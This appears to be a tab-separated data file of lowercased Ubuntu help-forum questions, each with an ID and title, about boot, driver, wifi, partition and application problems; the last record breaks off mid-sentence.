447194	i get authentication is needed to run `/usr/bin/dropbox ' as the super user	in a system popup window on startup . anyway to avoid this ? fwiw i authenticate ok with my pw . i think this may have started after my recent upgrade from ubuntu 12 - > 13
447195	toshiba satellite c50 - gui not working at all on ubuntu 12.04 lts	i bought a new laptop toshiba satellite c50-a-1jq and i 'm unable to run any gui under ubuntu 12.04 lts or 13.04 ( the same happens for booting from liveusb and for an installed system ) . after booting the screen goes black ( as if it turned off ) and i ca n't do anything , but i guess the system loads normally ( i still hear the standard ubuntu splash screen sound ) . by including `` nomodeset '' parameter in grub i 'm able to run the system in tty command line , but any attempt to run unity , startx etc . fails ( i get error messages indicating that no screen was found ) . the laptop uses intel hd graphics and i suspect ( i 'm not sure though ) that this might be an issue with graphics driver , but could n't find anything helpful on the internet ( i looked at almost all possible threads relating to this type of issue and most people claim that either including `` nomodeset '' or `` acpi_osi=linux '' in grub should work or that the default drivers should be ok , but neither works for me ) . any help would be much appreciated .
447200	not installing ubuntu 13.10 64-bit on dell inspiron 5420	i have a dell inspiron 5420 i7 with 8gb of ram . when i try to install ubuntu 13.10 64-bit by using a bootable usb device , which was created with universal usb installer , it failed to install on my laptop . the installing processing is running and provide some error like bus error . thanks
447201	windows 8 deletes grub when booting	i have this situation : sony vaio svf1521v1eb windows 8 preinstalled in uefi . i decided to install ubuntu 13.10 in dual boot . so i downloaded the amd64 iso , burnt on a dvd , then booted from dvd in uefi mode and installed ubuntu . it worked fine , i had ubuntu and windows 8 installed . on booting grub asked me if i wanted ubuntu 13.10 or windows boot loader ( uefi ) . i used few times ubuntu , and was ok. then i needed to boot windows 8 . i have booted it and worked a bit . then shutdowned the pc . when i powered it on , grub did n't appear anymore ! it booted directly on windows8 ! i reinstalled ubuntu with the dvd and grub came back , then when i booted windows8 grub disappeared again . does windows delete grub ? how can i have a `` persistent '' version of grub installed ? thank you very much edit : i tried all the workaround proposed , with no luck . i guess it is a problem in the vaio firmware , which has strange settings about boot . pc manufacturers are worse and worse ... they produce pc only for windows , which i would not even define as an o/s . bye
447203	uefi bootable usb stick ubuntu 12.04 lts	i bought a new laptop yesterday ( an acer e1-510 with windows 8.1 ) and did not know that it has a shitty uefi when i tried to install ubuntu 12.04 ( .4 ) lts from usb drive but when i click install linux , the fans turn loud and then the pc shut down completely . so i read , that i need a uefi bootable usb stick with ubtuntu , and i do n't really understand the tutorials and instructions how to do this ... thanks in advance . greetings kaito : ) edit : i just saw , there is no difference in ubuntu versions for intel and amd cpus , correct ?
447204	wifi issues on laptop after update	this issue is driving me nuts . i have a hp laptop with an atheros wifi built in adapter . i have had windows on this machine for a long time and everything worked fine , so i decided to try out ubuntu and since then i get no wifi . i first placed ubuntu 13.04 on a bootable usb stick and installed it . everything worked fine , and i was able to connect to my wifi . that is until i chose to installed all the updates . it knocked out my card and i could never reconnect . after spending almost a couple of days looking through suggestions , i decided to load 12.04 in case there is a bug . so i created a new bootable usb for 12.04 and installed again . and again everything worked until i did all updates , which resulted in 'no wifi ' . this time the wifi adapter is available and not blocked , but it will not take the password . it keeps prompting me for the password . i followed many suggestions found here in the forums but no dice . right now i am on because i booted from usb and chose try ubuntu option . that allows me to use wifi . the installed and updated version does not . i can start over and try to figure out which update is knocking out the wifi , but if anyone can help me find a quicker solution i would appreciate it .
447208	how to install dropbox 2.6.27 ?	how to install dropbox 2.6.27 ( published on 04/11/2014 ) on ubuntu 13.10 ? i ca n't find the installer in the folders i extracted from the archive . official link : dropbox 2.6.27
447209	kget showing in application but not opening	i ran the command int terminal kget it shows the following output nitesh @ nitesh : ~ $ kget qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . kget is already running ! qdbusconnection : session d-bus connection created before qcoreapplication . application may misbehave . how can i stop it i also ran the command sudo top but it does not show running kget please help me
447210	ca n't remove package	i guess i removed some files that package jetty required because when i try to remove it with apt-get remove jetty i get this : removing jetty ... * jetty is not installed invoke-rc.d : initscript jetty , action `` stop '' failed . dpkg : error processing jetty ( -- remove ) : subprocess installed pre-removal script returned error exit status 1 * jetty is not installed invoke-rc.d : initscript jetty , action `` start '' failed . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : jetty e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so how can i remove it ?
447211	best practices for keeping ec2 ubuntu machines updated	following the recent heartbleed vulnerability of openssl , i would like to keep my ec2 machines updated on a regular basis . the naive approach would be setting an hourly cron job for security updates ( sudo apt-get update & & sudo unattended-upgrade ) . are there any risks of doing that ? is there a recommended update mechanism for ec2 machines ?
447219	how to add languages to guest session ?	i want to add arabic language to guest season , because there is only english , but i ca n't do it . can any body help me with that problem ?
447223	i can not log in to my computer from gnome login session , but can from tty	help ! something really terrible just happened a few hours ago ... first , i entered my password as the picture below , after pressing enter , it would show some information in terminal , and then it would return to the first picture ( gnome login session ) immediately . so , i tried to log in to my computer from tty mode , and then i could log in to my laptop ! so , what should i do next to fix this irritating problem ? reinstall the gnome login session ? and how ? reinstall the whole system ? ( i do n't really this can solve this problem ) ... any suggestions ? thanks .
447224	ubuntu slow in lenovo s215	i just bought a lenovo netbook , the spec is amd e1 2100 1.4ghz with hd 8210 ram 2gb is it make sense with that spec my ubuntu is running slow ? or is there anything i can do to make my ubuntu run faster ? sometimes when i browse the internet and page is loading the cursor is blinking . i use ubuntu 12.04 lts with gnome classic as my desktop environment ( it was gnome 3 , but it is really slow like a snail )
447225	ubuntu video player , central european subtitles	i am living in romania , a central european country and i am trying to see a movie with an integrated subtitle . the problem is that the default video player does not display characters like 'č ' , 'č ' even though i 've tried all the central european encodings . is there any fix for this ?
447226	buliding and running ns-3 based program and doing all that trough geany	everyone ! now , i wanted to set up my geany so i can build , compile and execute any ns-3 based program instead of always using console way and compiling there the program and executing again in the console . info : i 'm working on ubuntu 12.04 this is the program that i have to compile and run : # include < ns3/core-module.h > # include < ns3/network-module.h > # include < ns3/internet-module.h > # include < ns3/point-to-point-module.h > # include < ns3/applications-module.h > using namespace ns3 ; int main ( ) { logcomponentenable ( `` udpechoclientapplication '' , log_level_info ) ; logcomponentenable ( `` udpechoserverapplication '' , log_level_info ) ; nodecontainer nodes1 , nodes2 , nodes3 , nodes4 , nodes5 ; nodes1.create ( 2 ) ; nodes2.add ( nodes1.get ( 1 ) ) ; nodes2.create ( 1 ) ; nodes3.add ( nodes1.get ( 1 ) ) ; nodes3.create ( 1 ) ; nodes4.add ( nodes3.get ( 1 ) ) ; nodes4.create ( 1 ) ; nodes5.add ( nodes3.get ( 1 ) ) ; nodes5.create ( 1 ) ; pointtopointhelper pointtopoint ; pointtopoint.setdeviceattribute ( `` datarate '' , stringvalue ( `` 26mbps '' ) ) ; pointtopoint.setchannelattribute ( `` delay '' , stringvalue ( `` 19ms '' ) ) ; netdevicecontainer devices1 , devices2 , devices3 , devices4 , devices5 ; devices1 = pointtopoint.install ( nodes1 ) ; devices2 = pointtopoint.install ( nodes2 ) ; devices3 = pointtopoint.install ( nodes3 ) ; devices4 = pointtopoint.install ( nodes4 ) ; devices5 = pointtopoint.install ( nodes5 ) ; // pointtopoint.enablepcapall ( `` vjezba-udp-echo-neizravna-veza '' ) ; internetstackhelper stack ; stack.install ( nodes1 ) ; stack.install ( nodes2.get ( 1 ) ) ; stack.install ( nodes3.get ( 1 ) ) ; stack.install ( nodes4.get ( 1 ) ) ; stack.install ( nodes5.get ( 1 ) ) ; ipv4addresshelper address1 ; address1.setbase ( `` 10.8.6.0 '' , `` 255.255.255.0 '' ) ; ipv4interfacecontainer interfaces1 = address1.assign ( devices1 ) ; ipv4addresshelper address2 ; address2.setbase ( `` 10.8.10.0 '' , `` 255.255.255.0 '' ) ; ipv4interfacecontainer interfaces2 = address2.assign ( devices2 ) ; ipv4addresshelper address3 ; address3.setbase ( `` 10.8.5.0 '' , `` 255.255.255.0 '' ) ; ipv4interfacecontainer interfaces3 = address3.assign ( devices3 ) ; ipv4addresshelper address4 ; address4.setbase ( `` 10.8.17.0 '' , `` 255.255.255.0 '' ) ; ipv4interfacecontainer interfaces4 = address4.assign ( devices4 ) ; ipv4addresshelper address5 ; address5.setbase ( `` 10.8.9.0 '' , `` 255.255.255.0 '' ) ; ipv4interfacecontainer interfaces5 = address5.assign ( devices5 ) ; ipv4globalroutinghelper : :populateroutingtables ( ) ; udpechoserverhelper echoserver1 ( 9 ) ; udpechoserverhelper echoserver2 ( 10 ) ; applicationcontainer serverapps1 = echoserver1.install ( nodes4.get ( 1 ) ) ; serverapps1.start ( seconds ( 2.6 ) ) ; serverapps1.stop ( seconds ( 39.0 ) ) ; applicationcontainer serverapps2 = echoserver2.install ( nodes5.get ( 1 ) ) ; serverapps2.start ( seconds ( 2.6 ) ) ; serverapps2.stop ( seconds ( 39.0 ) ) ; udpechoclienthelper echoclient1 ( interfaces4.getaddress ( 1 ) , 9 ) ; echoclient1.setattribute ( `` maxpackets '' , uintegervalue ( 7 ) ) ; echoclient1.setattribute ( `` interval '' , timevalue ( seconds ( 1.9 ) ) ) ; echoclient1.setattribute ( `` packetsize '' , uintegervalue ( 8520 ) ) ; udpechoclienthelper echoclient2 ( interfaces5.getaddress ( 1 ) , 10 ) ; echoclient2.setattribute ( `` maxpackets '' , uintegervalue ( 7 ) ) ; echoclient2.setattribute ( `` interval '' , timevalue ( seconds ( 1.9 ) ) ) ; echoclient2.setattribute ( `` packetsize '' , uintegervalue ( 8520 ) ) ; applicationcontainer clientapps1 = echoclient1.install ( nodes1.get ( 0 ) ) ; clientapps1.start ( seconds ( 2.8 ) ) ; clientapps1.stop ( seconds ( 37.0 ) ) ; applicationcontainer clientapps2 = echoclient2.install ( nodes2.get ( 1 ) ) ; clientapps2.start ( seconds ( 2.8 ) ) ; clientapps2.stop ( seconds ( 37.0 ) ) ; simulator : :run ( ) ; simulator : :destroy ( ) ; return 0 ; } this is the code what i had to use to build and run programs all this time : root @ lipovi : /home/lipovi/repo/ns-3-dev # ./waf ( this builds it ) root @ lipovi : /home/lipovi/repo/ns-3-dev # ./waf -- run scratch/programname ( this runs it ) if you 're wondering why i 'm root , i created it that way so i can only run , although i 'm the only user . and yes , the ns-3 is in my home directory , it 's used there , not in any of the system folders . followed the tutorial on the ns-3 site . what do i have to change here so i can build , compile and execute ns-3 programs trough geany ? ? ? i really want to shorten my approach ( streamline it ) so it 's for users without the absolute necessity for console usage .
447227	is it possible to shrink/enlarge/edit ubuntu partition/filesystem on a nexus4 dual boot system ?	i have just installed ubuntu touch on my nexus 4 device , using this procedure , in dual boot mode ( android 4.4.2 + u.touch ) . then i was trying to install some packages ( prerequisites for another software i would like to compile ) for a weight of ~250mb . it said that there was n't enough space left on the device to install all the packages . i supposed it is due to the fixed ( 2.7 gb , not large enough , probably ) size of the partition where the ubuntu filesystem lives . does anybody know a way to resolve this issue ? is it possible in someway to resize the partition ? have i centered the problem or did i misunderstand something in this context ? any help would be appreciated . this question could be edited in function of the answers received , in order to describe the problem more correctly and specifically . thanks for the attention .
447229	connecting nexus with ubuntu not working properly	i 'm trying to connect my nexus 4 with ubuntu 13.10 via usb . but the device is reconnecting every second ( and opening nautilus every time ) . if i leave the device connected it opens infinitely many nautilus windows ! ? does anyone know what might cause the problem ?
447231	sublime text does n't open files from pcmanfm	do you have any clue what might me a problem when opening text file from pcmanfm file manager by sublime text 3 ? nothing happens then . in thunar it works just like it should work . do you have idea where could a problem be ? i have opened a sublime_text.desktop : [ desktop entry ] version=1.0 type=application name=sublime text genericname=text editor comment=sophisticated text editor for code , markup and prose exec=/opt/sublime_text/sublime_text % f terminal=false mimetype=text/plain ; icon=sublime-text categories=texteditor ; development ; startupnotify=true actions=window ; document ; [ desktop action window ] name=new window exec=/opt/sublime_text/sublime_text -n onlyshowin=unity ; [ desktop action document ] name=new file exec=/opt/sublime_text/sublime_text -- command new_file onlyshowin=unity ; i am using xubuntu , 13.10 . thank you very much for any response !
447237	russian layout - shortcuts like ctrl+c , ctrl+v not working . [ 13.10 ]	i 've read many online resources , but got nothing . shortcuts like ctrl+c | ctrl+v | ctrl+x do n't work in most of applications when i switch to russian layout , but when i switch back to english ( us ) everything work ok. -- it is terrible ! i tried to move english layout to the top of layouts ' order , but it does n't help . -- please , help !
447241	where do i get windows 7 software for virtualbox ?	i have just got a sony xperia phone . i am trying to connect that with the ubuntu os i have . i was told it would work on ubuntu by the shop assistant..but that was a lie . ubuntu is very new to me and i am so confused . i have spent the last 6 hours trying to find a way for it to work . i am currently watching this youtube video : http : //www.youtube.com/watch ? v=1dhws4ezexu and have done everything up to this point at 4:37 , the only problem is i do n't have the software or drivers for windows 7 , this guy downloaded them from a torrent . does anyone know how i can get what ever i need for this to work ? thank you so much .
447242	how to start download ubuntu 14.04	i decided to switch to the new lts ubuntu 14.04 . due to the low network speed downloading it will take some days . so it take some time to get the new ubuntu after release . to avoid the delay i decide to download right now . the plan is start download currently available iso image ( alpha , beta , daily build or something else i do n't know ) from http : //cdimage.ubuntu.com/releases . after downloading iso file , download the .zsync file , which wall be available after the final release . using that .iso file and .zsync make the final release as described here . the problem is i do n't know which iso file should be selected to download . there are many files ( alpha , beta , daily build or something else i do n't know ) . afaik .zsync files made from different base files will be different . which .iso file and .zsync files should i download to make the final release of ubuntu 14.04 edit : from the comment from @ the_seppi , i understand i can use the same zsync file for alpha , beta , daily builds . am i right ?
447243	black screen with `` input signal out of range '' message , after amd graphic driver installation [ 13.10 ]	i recently installed ubuntu 13.10 64bit alongside windows 7 64bit , and both ran fine . then i installed amd graphic driver for my video card radeon r9 270 following the 3rd ( manual ) procedure given in these instructions . i installed amd catalyst 13.12 . everything installed successfully according to the link , but then , after restarted my system and booting into ubuntu i got a black screen with : '' input signal out of range '' my monitor does n't support 1920x1080 , it support 1366x768 natively . i tried booting again and entered ctrl+alt+f1 , then : gksudo gedit /etc/default/grub [ or ] gksu gedit /etc/default/grub [ or ] sudo gedit /etc/default/grub but every time it gave the same result : '' can not open display '' i tried searching for a solution this whole day but could n't find something useful , so please help me to resolve this issue .
447244	hard drive moving folders mysteriously	i had a pretty scary moment today ( reminiscent of the highly illogical ms word 'ca n't open file ' moments that made me abandon windows altogether ) when a folder i was editing a latex report in simply disappeared ! here 's the system log : pedro @ x230t : ~ $ cat /var/log/syslog | grep sda1 apr 13 13:59:59 x230t kernel : [ 1.163585 ] sda : sda1 sda2 < sda5 > apr 13 13:59:59 x230t kernel : [ 2.133568 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) apr 13 13:59:59 x230t kernel : [ 17.023928 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro i have been googling around about this and eventually found my data in the `` trash '' folder for reasons completely unknown to me . even if i had erased the files by mistake , the os should have complained that i was currently using a given file , right ? why did this happen ? how to prevent it from happening again ? i ran the disk utility and my hard drive seems healthy from the tests there . i also ran sudo badblocks -v /dev/sda1 and got nothing . any ideas/tips/commentaries are highly welcomed . thanks !
447245	how do i determine the route that a download took ?	basically i have 6 vms set up , all configured with static routes , providing a client 2 routes to a server . the static routes have all had metrics added to them so that the the traffic takes the preferred route of choice . i 've used traceroute to check that it works as designed . i use the wget command to download a file from the server . is there a way to either monitor this connection , or another tool , which i can use to see the route that the traffic is taking to obtain the file from the server ? my need for this it that i plan to implement a load balancer soon so need some way of checking . many thanks
447247	run php from the command line	i have installed xampp v1.8.3 for my php development . i am new to ubuntu , so i do n't know how to set environment variable for php which is located at /opt/lampp/bin/php . i can run php scripts from localhost just fine , but i wanted to run them from the command line as well . i want to set this variable for every user , since i am the only one who uses this system .
447250	query on ubuntu installation in laptop	i have a laptop with celeron dual core with 2 gb ddr2 ram and 40 gb of hard disk . which version of ubuntu you recommend me to install for proper functioning of my laptop
447251	sketchy ui used in ubuntu documentation ?	i 'm looking for the software used to create the ui mockups in ubuntu 's documentation , for example , here : https : //wiki.ubuntu.com/softwareupdates thanks . edit : the replies i got here are a bit off mark . i do agree , though , that my question is a duplicate . i eventually found the answer here : http : //askubuntu.com/a/14634/240865
447256	i get an error while starting ubuntu	it takes too long at the black screen with blinking underscore icon & after that a message display on the blackscreen saying : [ 18.052332 ] usb 1-1.1 : string discriptor 0 read error : -22
447261	how do i adjust the pressure range in my wacom tablet ? ubuntu 13.10 - motion le1700	i have a le1700 tablet pc that i 'm trying to save from the xp eos through use of ubuntu and everything works out of the box but i 'm getting to high a range of pressure . xinput states that that i have 0 to 2056 levels when the pen only works 256 levels . how could i adjust this without using the curves to kinda work around it ... thanks for your time !
447265	grub boot-loader not getting repaired	i am getting no screen for selection of which os to boot . i installed windows 8 over ubuntu 13.10 . in boot-repair i selected recommended repair but later the repair failed and it gave me this url directing to the problem : http : //paste.ubuntu.com/7244788/ . can anyone study my problem at above url and help me out ? thank you ! the computer directly boots to windows 8
447268	apticron emails marked as spam	i am using apticron to get emails when packages need updating . the problem is that they are getting inside the spam folder . i suspect it to be ( even though i am not sure ) because the `` from : '' field , which is root @ mercury . im guessing this is because the name of my laptop is mercury . how could i solve this situation ? i could add filters on my email , but i would prefer a server-side solution .
447277	connecting ubuntu machine to a windows ad-hoc network	i am trying to connect an ubuntu 12.04 machine , over wifi , to a windows 7 machine for file sharing . to do so , i have created an ad-hoc network ( wep protocol ) in the windows machine . after i enter the pass-phrase , the ubuntu machine starts searching for the network , but it ends up with a disconnection . i am inexperienced in networking , can someone please tell me why this occurs ?
447279	i disabled my administrator account , locked it without having other accounts	i disabled my administrator account and lock it accidentally without creating other account leaving me only the guest account to access . i tried finding for solutions in the net but none have the same case for me.i also tried to click the unlock tab in the user account to make changes to it in hope that i can enable it again but it did n't respond .
447280	how to install rubygems in ubuntu 12.04 with ruby 1.9.3	so i used these commands : sudo apt-get install ruby 1.9.3 cd /etc/alternatives sudo ln -sf /usr/bin/ruby1.9.3 ruby from http : //stackoverflow.com/questions/11078166/how-do-i-install-ruby-1-9-3-on-ubuntu-without-rvm in order to get ruby 1.9.3 and make it the default . that appears to have worked fine . now when i attempt to use gem install it tells me the gems are already the latest . however , when i attempt to run a script it tells me it ca n't find the gem i require on the first line . long story short , this script did n't work in ruby 1.8.7 due to an error farther down in the code but did get past the require lines without issue . so i expected to and assume i need to reinstall all my 1.8.7 gems for 1.9.3 or at least figure out how to point 1.9.3 at the gems i 've installed . how do i do get usable gems for 1.9.3 ?
447281	hot bar inaccessible , no alt-tab , no program menu and other ui problems suddenly occuring	i turned on my machine here today and multiple elements of the ubuntu ui had stopped working . the hot bar , with applications like terminal , system preferences etc . which normally pops forward when i move the mouse to the left side of the screen does not do so anymore . the `` windows '' key ( or whatever it 's called ) which normally brings forward a search tab at the top of the screen does nothing now . any shortcut with the windows key does nothing . normally windows+1 open application # 1 in my hot bar . alt-tab does not work . it seems to act as a simple tab . changing workspaces with control-alt- does not change the workspace . instead it types a for ctr-alt-up , b for ctrl-alt-down , c for ctrl-alt-right and d for ctrl-alt-left . normally there is an application menu at the top , if you move the mouse up there . not anymore . i supect it may be something to do with the windows management or configuration . since this is a new issue it may be due to an application that failed to start or did not properly set up . i 've run sudo apt-get update followed by an reboot of the system . no success . i noticed that software-center was failing to work due to permissions with python packages . it may have been there for longer than today . after fixing it , the main issue listed above persisted . i 've seen another person with what seemed to be an equivalent issue due to unity http : //askubuntu.com/a/185119/235211/ following his solution did nothing for me . suggestions on how i can fix the issue or further debug it would be greatly useful ?
447284	steam crashes on run	alright so this is rather odd , for some reason whenever i run steam it gets to the update pop-up then crashes . i 'm running 12.04 32bit on my dell latitude atg d620 and what i find odd is on my pc i built ( running 12.04 64bit ) i have no problems running steam at all . when i ran steam in terminal this is what i got . dxnfbkjdfk @ tits : ~ $ steam running steam on ubuntu 12.04 32-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) [ 0413/095724 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) intel_do_flush_locked failed : input/output error /home/buildbot/buildslave_steam/steam_rel_client_ubuntu12_linux/build/src/clientdll/../common/steamservice.cpp ( 50 ) : assertion failed : m_hservicelib == null assert ( assertion failed : m_hservicelib == null ) : /home/buildbot/buildslave_steam/steam_rel_client_ubuntu12_linux/build/src/clientdll/../common/steamservice.cpp:50 installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140413095724_11.dmp no minidump written , nothing to upload . /home/dxnfbkjdfk/.local/share/steam/steam.sh : line 755 : 3082 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-a7850f30-e313-4120-b1f3-ac8bf2140413 i ran it again after i deleted the appcache and i got this . dxnfbkjdfk @ tits : ~ $ rm -rf ~/.steam/steam/appcache dxnfbkjdfk @ tits : ~ $ steam running steam on ubuntu 12.04 32-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) [ 0413/100856 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) intel_do_flush_locked failed : input/output error installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) /home/buildbot/buildslave_steam/steam_rel_client_ubuntu12_linux/build/src/clientdll/../common/steamservice.cpp ( 50 ) : assertion failed : m_hservicelib == null assert ( assertion failed : m_hservicelib == null ) : /home/buildbot/buildslave_steam/steam_rel_client_ubuntu12_linux/build/src/clientdll/../common/steamservice.cpp:50 installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140413100854_1.dmp /home/dxnfbkjdfk/.local/share/steam/steam.sh : line 755 : 3401 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-f71bef38-7f2a-4140-a3ad-ff04d2140413 any insight would be helpful . | | | | | | so i ran it again through terminal , worked for a moment and then crashed again . this is what i got ( steam:3262 ) : gtk-warning ** : failed to load type module : ( null ) execcommandline : `` /home/dxnfbkjdfk/.steam/root/ubuntu12_32/steam steam : //open/driverhelperready '' execsteamurl : `` steam : //open/driverhelperready '' generating new string page texture 93 : 1024x256 , total string texture memory is 2.29 mb capijobrequestuserstats - server response failed 2 generating new string page texture 108 : 128x256 , total string texture memory is 2.42 mb generating new string page texture 114 : 512x256 , total string texture memory is 2.95 mb generating new string page texture 115 : 128x256 , total string texture memory is 3.08 mb generating new string page texture 119 : 2048x256 , total string texture memory is 5.18 mb generating new string page texture 122 : 256x256 , total string texture memory is 5.44 mb installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) onfocuswindowchanged to window type : k_ewindowtypenonsteamdesktop , 0 intel_do_flush_locked failed : input/output error [ 2014-04-17 10:34:25 ] startup - updater built feb 25 2014 13:44:43 [ 2014-04-17 10:34:25 ] verifying installation ... [ 2014-04-17 10:34:25 ] verification complete /home/buildbot/buildslave_steam/steam_rel_client_ubuntu12_linux/build/src/clientdll/../common/steamservice.cpp ( 50 ) : assertion failed : m_hservicelib == null assert ( assertion failed : m_hservicelib == null ) : /home/buildbot/buildslave_steam/steam_rel_client_ubuntu12_linux/build/src/clientdll/../common/steamservice.cpp:50 installing breakpad exception handler for appid ( steam ) /version ( 1393366296_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140417103425_1.dmp /home/dxnfbkjdfk/.local/share/steam/steam.sh : line 755 : 3262 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-8ac5537f-e364-4b4a-8854-70bce2140417
447285	why 13.04 raring is not in http : //old-releases.ubuntu.com/	i 'm trying to install software ( bundlebee ) from the old 13.04 ubuntu release following this instructions but it isnt working . i think thats because in http : //old-releases.ubuntu.com/ there are n't a raring folder .
447290	disk '/dev/sdb ' does n't contain a valid partition table	i have installed ubuntu on the usb stick and afterwards tried to clean up the disc to install another version of ubuntu . i was not able to do it ( even when tried to delete files by using sudo -rm ) , because of the read-only files . trying to format the disk with gparted : the disks has flags boot and lbs . after unmounting the disk i get the code in console : /dev/sdb : unrecognised disk label input/output error during write on /dev/sdb after typing in the terminal fdisk -l i receive this message : disk /dev/sdb : 8441 mb , 8441462784 bytes 64 heads , 32 sectors/track , 8050 cylinders , total 16487232 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x704e26c8 disk /dev/sdb does n't contain a valid partition table` after running : fdisk /dev/sdb o n ( and than all default , so : primary , partition number 1 , first sector 2048 , last sector 16487231 ) w and trying to write a new partition table i get this message : the partition table has been altered ! calling ioctl ( ) to re-read partition table . warning : re-reading the partition table failed with error 16 : device or resource busy . the kernel still uses the old table . the new table will be used at the next reboot or after you run partprobe ( 8 ) or kpartx ( 8 ) syncing disks . after running dmesg | tail the code : [ 8223.479979 ] info fld=0x0 [ 8223.479984 ] sd 12:0:0:0 : [ sdb ] [ 8223.479990 ] add . sense : write protected [ 8223.479995 ] sd 12:0:0:0 : [ sdb ] cdb : [ 8223.479998 ] write ( 10 ) : 2a 00 00 00 00 00 00 00 08 00 [ 8223.480043 ] end_request : critical target error , dev sdb , sector 0 [ 8223.480050 ] buffer i/o error on device sdb , logical block 0 [ 8223.480054 ] lost page write due to i/o error on sdb [ 9080.052379 ] fat-fs ( sdb1 ) : invalid media value ( 0x10 ) [ 9080.052389 ] fat-fs ( sdb1 ) : ca n't find a valid fat filesystem after running : sudo dd if=/dev/zero of=/dev/sdx bs=512 count=1 i got : 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0,011829 s , 43,3 kb/s so i guessed it worked . unmounted the disk , rebooted the system and the problem persist . do you have some ideas how to repair it ? i would be thankful for help !
447294	why ca n't i install ubuntu on my fujitsu siemens amilo pro ?	after several attempts , i can not even install the latest ubuntu onto my fujitsu siemens amilo pro . it is running windows vista and i even attempted to install it using windows , which still failed . i also attempted to install for a usb stick , which would get the ubuntu 13.10 screen with the colour changing blocks , this would be there for a while and then the screen would go black with no install or try screen appearing , just black . is there any way to solve this without messing with code as i have no experience with coding ! many thanks !
447295	where is the bash history for the root user saved ?	i 'm not talking about .bash_history from my home directory . i usually prefer to use sudo -i or sudo su and then run commands as root user . since , after these commands the history is not saved in the .bash_history file from my home directory , i want to know if this history is saved somewhere or not and if yes , where ?
447297	install dial-up modem in ubuntu 13.10 64bit	here is the details i got from running ./scanmodem only plain text email is forwarded by the discuss @ linmodems.org list server , as html can contain viruses . use as the email subject line : yourname , yourcountry kernel 3.11.0-17-generic with this subject line cogent experts will be alerted , and useful case names left in the archive . yourcountry will enable country specific guidance . linux experts in yourcountry can be found through : http : //www.linux.org/groups/index.html . they will know your country 's modem code , which may be essential for dialup service . responses from discuss @ linmodems.org are sometimes blocked by an internet provider mail filters . so in a day , also check the archived responses at http : //www.linmodems.org -- -- -- -- -- -- -- -- -- -- -- -- -- system information -- -- -- -- -- -- -- -- -- -- -- -- -- -- cpu=x86_64 , ubuntu , alsa_version=k3.11 . linux version 3.11.0-17-generic ( buildd @ toyol ) ( gcc version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu8 ) ) # 31-ubuntu smp mon feb 3 21:52:43 utc 2014 scanmodem update of : 2011_08_08 distrib_id=ubuntu distribcodename=saucy the dkms driver upgrade utilities are installed , some modem drivers can only be used in 32 bit modem on x86_64 systems , while some others are competent on x86_64 systems . cases are : 1 ) http : //linmodems.technion.ac.il/bigarch/archive-seventh/msg03119.html for the snd-hda-intel audio+modem driver . also applicable to ac97 modem controllers . in both cases , 32 bit libraries must be installed to support the slmodemd helper having a precompiled 32 bit component . 2 ) for usb modems using the slusb.ko driver . 32 bit libraries must be installed to support the slmodemd helper having a precompiled 32 bit component 3 ) the hsfmodem and hcfpcimodem drivers for conexant chipsest modes are x86_64 competent . 4 ) agrsm packages for lsi/ageresystems softmodems are not competent on x86_64 systems . there are no blacklisted modem drivers in /etc/modprobe* files potentially useful modem drivers now loaded are : snd_hda_intel attached usb devices are : id 04f2 : b044 chicony electronics co. , ltd acer crystaleye webcam id 08ff:1600 authentec , inc. aes1600 if a cellphone is not detected , see http : //ubuntuforums.org/archive/index.php/t-878554.html a sample report is : http : //linmodems.technion.ac.il/bigarch/archive-nineth/msg00578.html if a usb modem or cellphone is attached and was not detected , please provide available information in your request to discuss @ linmodems.org candidate pci devices with modem chips are : 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) high definition audio cards can host modem chips . for candidate card in slot 